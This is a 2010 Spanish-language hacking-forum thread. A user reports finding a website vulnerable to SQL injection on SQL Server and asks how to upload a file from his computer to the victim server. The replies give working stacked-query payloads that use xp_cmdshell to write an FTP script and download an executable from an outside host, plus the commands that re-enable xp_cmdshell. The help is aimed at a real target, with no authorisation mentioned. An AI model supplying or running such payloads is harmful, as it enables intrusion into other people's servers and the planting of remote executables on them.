elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Pregunta sobre inyeccion sqlserver.		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Pregunta sobre inyeccion sqlserver.  (Leído 2,963 veces)
PHAMTOM

Desconectado Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF


Ver Perfil
Pregunta sobre inyeccion sqlserver.
« en: 18 Febrero 2010, 04:07 am »
Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM
En línea
Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más
nacho87

Desconectado Desconectado

Mensajes: 71


Ver Perfil WWW
Re: Pregunta sobre inyeccion sqlserver.
« Respuesta #1 en: 19 Febrero 2010, 09:16 am »
En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
Código:
;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt';
;master..xp_cmdshell 'cmd /c echo quit>>asd.txt';
;master..xp_cmdshell 'cmd /c ftp -s:asd.txt ftp.anonimo.com'

Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más.

Saludos!!
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Pregunta sobre inyeccion sqlserver.
« Respuesta #2 en: 19 Febrero 2010, 19:20 pm »
Creo que es...
Código
  1. EXEC sp_configure 'show advanced options', 1
  2. RECONFIGURE
  3.  
  4. EXEC sp_configure 'xp_cmdshell', 1
  5. RECONFIGURE
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
error php con sqlserver
PHP 		kakashi20 2 2,493 Último mensaje 29 Abril 2012, 03:22 am
por engel lex
Pregunta sobre inyeccion dll, que pasa si el proceso se cierra
Análisis y Diseño de Malware 		Borito30 2 3,895 Último mensaje 27 Noviembre 2016, 17:55 pm
por Borito30
[Pregunta]: ¿Existe una vulnerabilidad de inyección en esta consulta?
Desarrollo Web 		Leguim 3 2,781 Último mensaje 12 Diciembre 2020, 20:37 pm
por Danielㅤ
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines